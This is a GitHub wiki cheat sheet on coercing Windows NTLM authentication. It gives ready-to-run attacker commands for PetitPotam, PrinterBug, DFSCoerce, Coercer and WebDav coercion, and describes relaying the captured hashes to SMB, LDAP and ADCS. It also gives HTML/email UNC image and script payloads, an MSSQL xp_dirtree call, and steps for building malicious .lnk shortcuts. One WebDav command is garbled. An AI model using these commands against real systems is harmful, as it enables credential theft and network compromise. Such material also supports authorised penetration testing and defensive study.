Coercion methods - CraigDonkin/Infrastructure GitHub Wiki

  • Run responder/Inveigh/NTLMrelayx etc on another host, and then coerce authentication
    • Crack NTLM hashes
    • Relay NTLM hashes to SMB
    • Relay NTLM hashes to LDAP
    • Relay NTLM to Web (ADCS etc)

MS-EFSR (PetitPotam)

https://github.com/topotam/PetitPotam

python3 PetitPotam.py -d <domain> -u <username> -p <password> <attacker> <target>

MS-RPRN (PrinterBug)

https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

printerbug.py '<domain>'/'<user>':'<password>'@'<target>' '<attacker>'

https://github.com/leechristensen/SpoolSample

SpoolSample.exe <target> <attacker>

MS-DFSNM (DFSCoerce)

https://github.com/Wh04m1001/DFSCoerce

dfscoerce.py -d <domain> -u <username> -p <password> <attacker> <target>

Coercer

  • Script that will attempt multiple different coercion attacks

https://github.com/p0dalirius/Coercer

WebDav

  • Check for WebClient enabled

cme smb <target(s)> -d <domain> -u <username> -p <password> -M webdav

  • Force the victim to authenticate via WebDav

``python3 PetitPotam.py -d -u -p @80/AAAA `

  • It seemed to work best using FQDN for attacker

Email/HTML documents

  • Send an email with a link to the server
  • Use an image, or SCRIPT inside an email/HTML file
<img src="\\xxx.xxx.xxx.xxx\image.png height="1" width="1">
<script>language='javascript' src="\\xxx.xxx.xxx.xxx\pwnd\pwnd.js"</script>

MSSQL

EXEC master.sys.xp_dirtree '\\xxx.xxx.xxx.xxx\pwnd',1,1

Windows Shortcuts

.lnk

lnkup.py --host <host> --type ntlm --output evil.lnk
lnkup.py --host <host>--type ntlm --output evil.lnk --execute "<windows command to execute>"
  • Make with PowerShell
$link = New-Object -ComObject WScript.Shell
$shortcut = $link.CreateShortcut("<\\path\shortcut.lnk>")
$shortcut.WindowStyle = 1
$shortcut.IconLocation = "<path to icon>"
$shortcut.Save()
⚠️ **GitHub.com Fallback** ⚠️